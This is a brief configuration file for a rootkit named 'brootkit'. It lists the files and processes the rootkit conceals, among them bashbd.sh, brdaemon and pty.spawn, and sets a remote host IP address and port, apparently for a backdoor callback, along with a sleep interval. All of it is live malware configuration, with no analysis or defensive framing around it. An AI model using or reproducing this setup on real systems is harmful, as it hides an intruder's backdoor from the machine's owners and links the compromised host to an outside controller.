#brootkit config file.
#
HIDE_PORT		
HIDE_FILE		br.conf,bashbd.sh,brootkit,.bdrc,brdaemon,wzt
HIDE_PROC		bashbd,brootkit,pty.spawn,brdaemon
REMOTE_HOST		107.151.149.242
REMOTE_PORT		4111
SLEEP_TIME		60

